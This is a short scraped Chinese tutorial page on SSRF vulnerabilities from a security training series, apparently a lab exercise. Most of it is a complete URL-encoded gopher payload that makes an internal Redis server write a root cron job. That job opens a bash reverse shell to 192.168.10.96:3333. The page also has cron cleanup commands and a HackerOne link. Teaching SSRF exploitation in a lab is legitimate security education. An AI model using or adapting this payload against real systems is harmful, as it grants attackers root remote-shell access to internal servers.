ssrf漏洞(上) · Farmsec Open Source(6)
时间:2022-12-04 19:15 来源:网络整理 作者:采集插件 点击:次
须先清除测试机(192.168.11.192)反弹shell计划任务,避免对如下测试造成影响 crontab -e crontab -l
使用ssrf漏洞将gopher攻击语句传递到内网redis主机 ?url=gopher%3A%2F%2F192.168.11.203%3A6379%2F_*1%250d%250a%248%250d%250aflushall%250d%250a*3%250d%250a%243%250d%250aset%250d%250a%247%250d%250afarmsec%250d%250a%2459%250d%250a%250a%250a*%2F1%20*%20*%20*%20*%20bash%20-i%20%3E%26%2Fdev%2Ftcp%2F192.168.10.96%2F3333%200%3E%261%250a%250a%250a%250d%250a*4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2416%250d%250a%2Fvar%2Fspool%2Fcron%2F%250d%250a*4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%244%250d%250aroot%250d%250a*1%250d%250a%244%250d%250asave%250d%250a%250a
ssrf与文件包含的相似处与不同处? 10 真实案例https://hackerone.com/reports/115748 Copyright © fsec.io 2022 all right reserved,powered by farmsec该文件修订时间: 2022-04-12 15:50:23 (责任编辑:admin) |



